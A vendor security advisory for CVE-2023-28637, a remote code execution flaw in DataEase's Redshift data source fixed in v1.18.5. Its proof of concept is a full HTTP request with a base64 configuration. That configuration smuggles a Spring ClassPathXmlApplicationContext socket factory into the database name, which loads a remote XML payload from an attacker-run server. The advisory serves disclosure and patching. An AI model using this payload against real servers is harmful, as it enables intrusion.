Headline

CVE-2023-28637: DataEase AWS redshift data source exists for remote code execution vulnerability

DataEase is an open source data visualization analysis tool. In Dataease users are normally allowed to modify data and the data sources are expected to properly sanitize data. The AWS redshift data source does not provide data sanitization which may lead to remote code execution. This vulnerability has been fixed in v1.18.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.

1 year ago

CVE

Open in Source

#sql #vulnerability #windows #amazon #js #git #java #rce #perl #aws #auth #firefox

Impact

In Dataease, a normal user can handle the data source. the AWS datasource redshift in the data source function doesn’t do properly security measures that will lead to remote code execution。

A normal user can input some properties that connected to the AWS Redshift。

The Redshift does not accept the EXTRA_PARAMS like other database like pgsql or mysql. But that is not a problem to construct a remote code execution.

The database filed doesn’t normalize , so just build a database name like that test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg={}

The complete configuration just like
configuration = { "initialPoolSize":5,"schema":"jdbc", "extraParams": "", "minPoolSize":5,"maxPoolSize":50,"maxIdleTime":30,"acquireIncrement":5,"idleConnectionTestPeriod":5, "connectTimeout":5,"customDriver":"default","queryTimeout":30,"host":"192.168.0.100", "dataBase":"test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg={}".format(payload), "username":"test","password":"test","port":"5432"}

And then will trigger the redshift execution remote code just like pgsql

from com.amazon.redshift.Driver#connect

then trigger at com.amazon.redshift.core.SocketFactoryFactory#getSocketFactory

POC

POST /datasource/validate/ HTTP/1.1 Host: 192.168.0.102 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: application/json, text/plain, / Accept-Language: zh-CN Accept-Encoding: gzip, deflate Content-Type: application/json Authorization: [A normal user token] LINK-PWD-TOKEN: null Content-Length: 889 Origin: http://192.168.0.102/ Connection: close Referer: http://192.168.0.102/

{"configuration":"eyJpbml0aWFsUG9vbFNpemUiOjUsInNjaGVtYSI6ImpkYmMiLCJleHRyYVBhcmFtcyI6IiIsIm1pblBvb2xTaXplIjo1LCJtYXhQb29sU2l6ZSI6NTAsIm1heElkbGVUaW1lIjozMCwiYWNxdWlyZUluY3JlbWVudCI6NSwiaWRsZUNvbm5lY3Rpb25UZXN0UGVyaW9kIjo1LCJjb25uZWN0VGltZW91dCI6NSwiY3VzdG9tRHJpdmVyIjoiZGVmYXVsdCIsInF1ZXJ5VGltZW91dCI6MzAsImhvc3QiOiIxOTIuMTY4LjAuMTAwIiwiZGF0YUJhc2UiOiJ0ZXN0P3NvY2tldEZhY3Rvcnk9b3JnLnNwcmluZ2ZyYW1ld29yay5jb250ZXh0LnN1cHBvcnQuQ2xhc3NQYXRoWG1sQXBwbGljYXRpb25Db250ZXh0JnNvY2tldEZhY3RvcnlBcmc9aHR0cDovLzE5Mi4xNjguMC4xMDA6NDgwODAvY2FsY3VsYXRvcjIueG1sIiwidXNlcm5hbWUiOiJ0ZXN0IiwicGFzc3dvcmQiOiJ0ZXN0IiwicG9ydCI6IjU0MzIifQ==","apiConfiguration":[],"type":"redshift","name":"test","configurationEncryption":true}

The configuration base64 decode is

{"initialPoolSize":5,"schema":"jdbc","extraParams":"","minPoolSize":5,"maxPoolSize":50,"maxIdleTime":30,"acquireIncrement":5,"idleConnectionTestPeriod":5,"connectTimeout":5,"customDriver":"default","queryTimeout":30,"host":"192.168.0.100","dataBase":"test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://192.168.0.100:48080/calculator2.xml","username":"test","password":"test","port":"5432"}

And make a http server at 192.168.0.100:48080 serve a file calculator2.xml

Affected versions: <= 1.18.4

Patches

The vulnerability has been fixed in v1.18.5.

Workarounds

It is recommended to upgrade the version to v1.18.5.

References

If you have any questions or comments about this advisory:

Open an issue in https://github.com/dataease/dataease
Email us at [email protected]